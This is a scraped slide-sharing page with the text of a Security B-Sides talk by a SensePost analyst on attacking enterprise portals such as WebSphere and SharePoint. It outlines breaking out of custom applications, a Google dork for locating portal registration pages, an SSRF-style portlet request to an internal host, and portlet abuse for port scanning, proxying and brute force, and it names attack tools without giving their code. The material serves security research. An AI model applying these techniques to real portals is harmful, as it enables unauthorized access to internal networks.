際際滷

際際滷Share a Scribd company logo

Enterprise Portals - Gateway to the Gold

Security B-Sides
Security B-Sides

This document discusses enterprise portals, which are frameworks for integrating information, people, and processes on intranets and websites. It describes popular portal vendors and technologies, the components of portals like portlets, and both the common functionality of portals and some common shortcomings related to security. It then discusses techniques for breaking out of custom applications on portals to access the full portal framework and ways to abuse portlet functionality for activities like port scanning and accessing protected resources on internal networks.

1 of 16
Enterprise Portals Gate to the Gold
`whoami` ≒ SensePost Specialist Security firm based in Pretoria Customers all over the globe Talks / Papers / Books ≒ ian@sensepost.com Associate security analyst I break stuff and write reports about breaking stuff ≒ Why this talk?
EP Vendors ≒ IBM WebSphere Portal ≒ SAP NetWeaver Portal ≒ Oracle Portal Products (PlumTree, BEA, SUN, ) ≒ OpenText Portal (Formerly Vignette) ≒ JBoss Portal ≒ Microsoft SharePoint Server ≒ Apache Jetspeed, Interwoven TeamPortal, ,
EP Overview ≒ Frequent on intranets. ≒ Also frequent on the Internet :) ≒ Framework for integrating information, people and processes** ≒ Consolidate and summarise diverse sources of information ≒ Provide customisable home-page for registered users **
EP Overview ≒ Popular platform for deployment of applications due to framework and built-in functionality ≒ Provide SDKs for customisation and deployment of custom applications ≒ Support pluggable components called portlets ≒ Generally J2EE-based, but there are some alternate platforms (i.e.: .NET, PHP, )
Portlet Overview ≒ Pluggable user interface components which are managed and displayed in a portal** ≒ Fragments of markup code (i.e: HTML / XML etc) which are aggregated in a portal page** ≒ Adhere to various standards WSRP (web services for remote portlets) Java Portlet Specification GET /moo?portlet=id&URI=http%3A%2F%2FHR%2Fbaa ≒ JSR168 HTTP 200 OK ≒ JSR268 ≒ Proprietary **
Functionality++ ≒ User Registration ≒ Portals are generally designed to share information provide functionality for searching documents, users, ..., ≒ Workflow components ≒ Messaging / Social networking ≒ Configuration and administrative components
Common Shortcomings ≒ Generally cater for multiple portal applications May expose intranet applications to the Internet ≒ Frequently allow registration for public users Functionality++ ≒ Due to complex installation of J2EE application servers and lazy sys-admins, frequently run with elevated privileges
Common Shortcomings ≒ Diverse log-in capabilities LDAP, XML, Database, ..., , * == SSO ≒ Developers of custom applications deployed on portal platforms frequently have not considered the underlying functionality of the platform ≒ Custom error pages defined for platform ≒ Complexity++
Breaking Out ≒ Custom applications frequently exploit functionality of portal framework but dont allow users direct access to framework functions ≒ or do they ?
Breaking Out ≒ Direct object access ≒ Google is your friend :> ≒ Forcing errors to display generic portal error messages ≒ Accessing site-registration ≒ HTML source comments and JavaScript ≒ Once we can break out of the custom application, we expose the full functionality of the portal
Finding Portals ≒ Google Hacks (nods at Johnny Long) ≒ site:, insite:, inurl:, , ≒ Demo site:za inurl:/portal/site inurl:/template.REGISTER
Abusing Portlets ≒ Original Advisory pertaining to IBM WebSphere WebSphere 2006/01/24 EPAM Systems ≒ Port Scanning ≒ Accessing protected resources ≒ Attacks at third parties ≒ Blended Attack Scenarios Denial Of Service Brute-Force Attacks against other protocols
PortletSuite.tgz ≒ PortletScan.py Scan for open ports by abusing portlets ≒ Pikto.py Scan for common virtual directory names and web server misconfigurations ≒ PorProx.py Provides proxy server functionality tunnelling HTTP requests through remote portlets
PortletSuite.tgz ≒ http://www.sensepost.com/blog ≒ Demo Breaking out Portlet-scanning Pikto Accessing protected resources PortletProx
Questions ? ian@sensepost.com

More Related Content

Enterprise Portals - Gateway to the Gold

  • 2. `whoami` ≒ SensePost Specialist Security firm based in Pretoria Customers all over the globe Talks / Papers / Books ≒ ian@sensepost.com Associate security analyst I break stuff and write reports about breaking stuff ≒ Why this talk?
  • 3. EP Vendors ≒ IBM WebSphere Portal ≒ SAP NetWeaver Portal ≒ Oracle Portal Products (PlumTree, BEA, SUN, ) ≒ OpenText Portal (Formerly Vignette) ≒ JBoss Portal ≒ Microsoft SharePoint Server ≒ Apache Jetspeed, Interwoven TeamPortal, ,
  • 4. EP Overview ≒ Frequent on intranets. ≒ Also frequent on the Internet :) ≒ Framework for integrating information, people and processes** ≒ Consolidate and summarise diverse sources of information ≒ Provide customisable home-page for registered users **
  • 5. EP Overview ≒ Popular platform for deployment of applications due to framework and built-in functionality ≒ Provide SDKs for customisation and deployment of custom applications ≒ Support pluggable components called portlets ≒ Generally J2EE-based, but there are some alternate platforms (i.e.: .NET, PHP, )
  • 6. Portlet Overview ≒ Pluggable user interface components which are managed and displayed in a portal** ≒ Fragments of markup code (i.e: HTML / XML etc) which are aggregated in a portal page** ≒ Adhere to various standards WSRP (web services for remote portlets) Java Portlet Specification GET /moo?portlet=id&URI=http%3A%2F%2FHR%2Fbaa ≒ JSR168 HTTP 200 OK ≒ JSR268 ≒ Proprietary **
  • 7. Functionality++ ≒ User Registration ≒ Portals are generally designed to share information provide functionality for searching documents, users, ..., ≒ Workflow components ≒ Messaging / Social networking ≒ Configuration and administrative components
  • 8. Common Shortcomings ≒ Generally cater for multiple portal applications May expose intranet applications to the Internet ≒ Frequently allow registration for public users Functionality++ ≒ Due to complex installation of J2EE application servers and lazy sys-admins, frequently run with elevated privileges
  • 9. Common Shortcomings ≒ Diverse log-in capabilities LDAP, XML, Database, ..., , * == SSO ≒ Developers of custom applications deployed on portal platforms frequently have not considered the underlying functionality of the platform ≒ Custom error pages defined for platform ≒ Complexity++
  • 10. Breaking Out ≒ Custom applications frequently exploit functionality of portal framework but dont allow users direct access to framework functions ≒ or do they ?
  • 11. Breaking Out ≒ Direct object access ≒ Google is your friend :> ≒ Forcing errors to display generic portal error messages ≒ Accessing site-registration ≒ HTML source comments and JavaScript ≒ Once we can break out of the custom application, we expose the full functionality of the portal
  • 12. Finding Portals ≒ Google Hacks (nods at Johnny Long) ≒ site:, insite:, inurl:, , ≒ Demo site:za inurl:/portal/site inurl:/template.REGISTER
  • 13. Abusing Portlets ≒ Original Advisory pertaining to IBM WebSphere WebSphere 2006/01/24 EPAM Systems ≒ Port Scanning ≒ Accessing protected resources ≒ Attacks at third parties ≒ Blended Attack Scenarios Denial Of Service Brute-Force Attacks against other protocols
  • 14. PortletSuite.tgz ≒ PortletScan.py Scan for open ports by abusing portlets ≒ Pikto.py Scan for common virtual directory names and web server misconfigurations ≒ PorProx.py Provides proxy server functionality tunnelling HTTP requests through remote portlets
  • 15. PortletSuite.tgz ≒ http://www.sensepost.com/blog ≒ Demo Breaking out Portlet-scanning Pikto Accessing protected resources PortletProx